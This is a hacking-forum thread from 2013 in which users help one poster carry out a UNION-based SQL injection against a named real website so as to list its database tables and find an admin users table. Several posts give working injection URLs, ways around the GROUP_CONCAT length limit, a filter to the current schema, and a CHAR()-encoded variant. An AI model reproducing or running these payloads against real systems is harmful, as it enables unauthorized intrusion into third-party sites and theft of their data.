Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Cann't find users table
Posted by: a_tek7
Date: June 05, 2013 12:03PM

http://www.mangaldeep.co.in/news1.php?id=-3+union+select+1,GROUP_CONCAT(table_name),3,4+from+information_schema.tables--

CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,INDEX_STATISTICS,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TA
(30/11/2003)

3

It means there 's no admin user?

Options: ReplyQuote
Re: Cann't find users table
Posted by: ajkaro
Date: June 05, 2013 12:59PM

There are 49 tables but you can't see them all because group_concat has 1024 chars limit.

To skip tables from information schema (CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS...) add:
+from+information_schema.tables where table_schema=database()--

Options: ReplyQuote
Re: Cann't find users table
Posted by: a_tek7
Date: June 08, 2013 12:19PM

thank you ajkaro

1. Is there any other method to extract all tables without chars limit.

2. what about the case that if by adding:

+from+information_schema.tables where table_schema=database()--

still chars limit restriction runs?

3. How can I exclude these extraced tables to extract the other tables? I means in query i want specify that "aaa" must not be displayed now.

Options: ReplyQuote
Re: Cann't find users table
Posted by: ajkaro
Date: June 09, 2013 04:33AM

1. yes it is. Read my tutorial http://zentrixplus.net/forum/index.php?/topic/592-tutorial-sqli-dump-data-in-one-shot/

2. if using "dump in one shot" syntax (see tutorial above) that is not needed any more

3. by adding: where table_name>'aaa'

Options: ReplyQuote
Re: Cann't find users table
Posted by: Vaibs
Date: June 14, 2013 09:41AM

No limit is is required,All tables are visible jus the space was needed.
http://www.mangaldeep.co.in/news1.php?id=-3+union+select+1,CHAR(60, 98, 108, 105, 110, 107, 62, 60, 104, 49, 62, 83, 101, 101, 32, 66, 101, 108, 111, 119, 60, 47, 104, 49, 62, 60, 47, 98, 108, 105, 110, 107, 62),GROUP_CONCAT(CHAR(60, 98, 114, 47, 62),table_name),4+from+information_schema.tables+where+table_schema=database()--+-

Cheers!

Vaibs

Options: ReplyQuote


Sorry, only registered users may post in this forum.